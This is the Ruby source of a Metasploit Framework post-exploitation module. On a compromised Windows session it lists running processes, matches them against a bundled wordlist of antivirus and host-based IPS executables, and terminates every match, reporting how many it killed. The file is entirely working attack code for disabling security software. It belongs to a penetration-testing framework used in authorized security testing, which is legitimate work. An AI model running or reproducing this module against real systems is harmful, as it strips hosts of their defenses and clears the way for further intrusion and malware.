GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/killav.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post-exploitation module that enumerates the session's process list,
# compares each process name against the bundled AV/HIPS executable
# wordlist, and attempts to kill every match. Metadata flags the module
# as OS_RESOURCE_LOSS: terminated processes are not restored afterwards.
class MetasploitModule < Msf::Post
  include Msf::Post::Process

  # Processes that are never considered, regardless of the wordlist.
  PROTECTED_NAMES = ['[system process]', 'system'].freeze

  # Module metadata: name, description, authorship, platform and session
  # compatibility, and the Meterpreter commands that `run` depends on.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    metadata = update_info(
      info,
      'Name' => 'Windows Post Kill Antivirus and Hips',
      'Description' => %q{
        This module attempts to locate and terminate any processes that are identified
        as being Antivirus or Host-based IPS related.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Marc-Andre Meloche (MadmanTM)',
        'Nikhil Mittal (Samratashok)',
        'Jerome Athias',
        'OJ Reeves'
      ],
      'Platform' => %w[win],
      'SessionTypes' => %w[meterpreter powershell shell],
      'Notes' => {
        'Stability' => [OS_RESOURCE_LOSS],
        'Reliability' => [],
        'SideEffects' => []
      },
      'Compat' => {
        'Meterpreter' => {
          # Both commands are required: one to list processes, one to kill them.
          'Commands' => %w[
            stdapi_sys_process_get_processes
            stdapi_sys_process_kill
          ]
        }
      }
    )
    super(metadata)
  end

  # Loads the wordlist, filters the session's process list down to matches,
  # and attempts to terminate each one, reporting per-process success or
  # failure and a final tally.
  #
  # @return [void]
  def run
    wordlist_path = ::File.join(Msf::Config.data_directory, 'wordlists', 'av_hips_executables.txt')
    # One executable name per line; the whole list is lowercased and de-duplicated.
    target_names = ::File.read(wordlist_path).strip.downcase.split("\n").uniq

    # Process names are compared as reported by the session; the protected-name
    # check is case-insensitive.
    av_processes = get_processes.select do |proc_info|
      name = proc_info['name']
      !PROTECTED_NAMES.include?(name.downcase) && target_names.include?(name)
    end

    if av_processes.empty?
      print_status('No target processes were found.')
      return
    end

    # kill_process's truthiness decides whether the attempt counts as a success.
    killed = av_processes.count do |proc_info|
      name = proc_info['name']
      pid = proc_info['pid']
      print_status("Attempting to terminate '#{name}' (PID: #{pid}) ...")
      terminated = kill_process(pid)
      if terminated
        print_good("#{name} (PID: #{pid}) terminated.")
      else
        print_error("Failed to terminate '#{name}' (PID: #{pid}).")
      end
      terminated
    end

    print_good("A total of #{av_processes.length} process(es) were discovered, #{killed} were terminated.")
  end
end